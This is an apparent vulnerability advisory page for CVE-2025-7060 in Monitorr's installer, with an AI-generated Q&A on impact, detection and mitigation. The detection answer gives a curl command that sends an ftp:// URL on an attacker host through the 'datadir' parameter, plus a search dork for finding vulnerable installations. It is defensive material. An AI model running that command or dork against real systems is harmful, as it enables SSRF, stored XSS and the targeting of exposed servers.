CVE-2025-7060
BaseFortify
Publication date: 2025-07-04
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| monitorr | monitorr | to 1.7.6m (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
| CWE-NVD-CWE-noinfo |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7060 is a vulnerability in Monitorr up to version 1.7.6m, specifically in the Installer component's mkdbajax.php file. It arises from improper input validation of the 'datadir' argument, which can be manipulated remotely. Attackers can supply a 'datadir' value that points to malicious JSON files via PHP stream wrappers (e.g., ftp://), causing the server to fetch and write attacker-controlled data. This leads to multiple issues including stored Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), and partial Denial of Service (DoS). Exploitation is difficult but possible without authentication, and a proof-of-concept exploit is publicly available. [1, 2]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to execute stored XSS attacks, which can compromise user sessions or perform malicious actions in the context of the Monitorr web interface. It also enables SSRF attacks, allowing attackers to make unauthorized requests from the server to internal or external resources, potentially exposing sensitive data or internal services. Additionally, it can cause partial denial of service by destabilizing or crashing the application. Overall, it affects the confidentiality, integrity, and availability of the system. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by searching for the presence of the vulnerable endpoint `/assets/config/_installation/mkdbajax.php` on your Monitorr installation, and by checking if the 'datadir' parameter is improperly handled. One detection method is to use Google hacking techniques such as searching for `inurl:assets/config/_installation/mkdbajax.php` to identify vulnerable targets. Additionally, you can monitor POST requests to `/assets/config/_installation/mkdirajax.php` that set the 'datadir' parameter to suspicious values like PHP stream wrapper URLs (e.g., ftp://, ssh://). Example commands include using curl to test the endpoint: `curl -X POST -d "datadir=ftp://attacker.com/malicious.json" http://your-monitorr-host/assets/config/_installation/mkdbajax.php` and observing the response or behavior. Network monitoring tools can also be configured to alert on such suspicious POST requests. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include validating and sanitizing the 'datadir' input parameter to prevent the use of PHP stream wrappers such as ftp:// or ssh://. Since no official patches or countermeasures have been published, consider restricting access to the vulnerable endpoints, disabling or removing the affected installer component if possible, and monitoring for suspicious POST requests to `/assets/config/_installation/mkdirajax.php` and `/assets/config/_installation/mkdbajax.php`. If feasible, replace the affected Monitorr version with a non-vulnerable version or alternative software. Additionally, avoid exposing the Monitorr installation publicly until a fix is available. [1, 2]